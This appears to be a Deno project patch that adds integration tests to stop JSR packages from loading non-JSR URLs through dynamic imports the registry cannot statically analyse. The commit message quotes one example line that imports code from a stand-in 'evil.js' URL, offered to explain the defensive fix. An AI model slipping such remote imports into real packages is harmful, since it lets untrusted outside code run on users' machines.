From 918c5e648f4bd08d768374ccde1b451b84793b76 Mon Sep 17 00:00:00 2001
From: David Sherret <dsherret@users.noreply.github.com>
Date: Wed, 28 Feb 2024 16:30:45 -0500
Subject: fix(jsr): do not allow importing a non-JSR url via unanalyzable
 dynamic import from JSR (#22623)

A security feature of JSR is that it is self contained other than npm
dependencies. At publish time, the registry rejects packages that write
code like this:

```ts
const data = await import("https://example.com/evil.js");
```

However, this can be trivially bypassed by writing code that the
registry cannot statically analyze for. This PR prevents Deno from
loading dynamic imports that do this.
---
 tests/integration/jsr_tests.rs | 16 ++++++++++++++++
 1 file changed, 16 insertions(+)

(limited to 'tests/integration/jsr_tests.rs')

diff --git a/tests/integration/jsr_tests.rs b/tests/integration/jsr_tests.rs
index fa8a9d8b9..25a0c8663 100644
--- a/tests/integration/jsr_tests.rs
+++ b/tests/integration/jsr_tests.rs
@@ -60,6 +60,22 @@ itest!(deps_info {
   http_server: true,
 });
 
+itest!(import_https_url_analyzable {
+  args: "run -A jsr/import_https_url/analyzable.ts",
+  output: "jsr/import_https_url/analyzable.out",
+  envs: env_vars_for_jsr_tests(),
+  http_server: true,
+  exit_code: 1,
+});
+
+itest!(import_https_url_unanalyzable {
+  args: "run -A jsr/import_https_url/unanalyzable.ts",
+  output: "jsr/import_https_url/unanalyzable.out",
+  envs: env_vars_for_jsr_tests(),
+  http_server: true,
+  exit_code: 1,
+});
+
 itest!(subset_type_graph {
   args: "check --all jsr/subset_type_graph/main.ts",
   output: "jsr/subset_type_graph/main.check.out",
-- 
cgit v1.2.3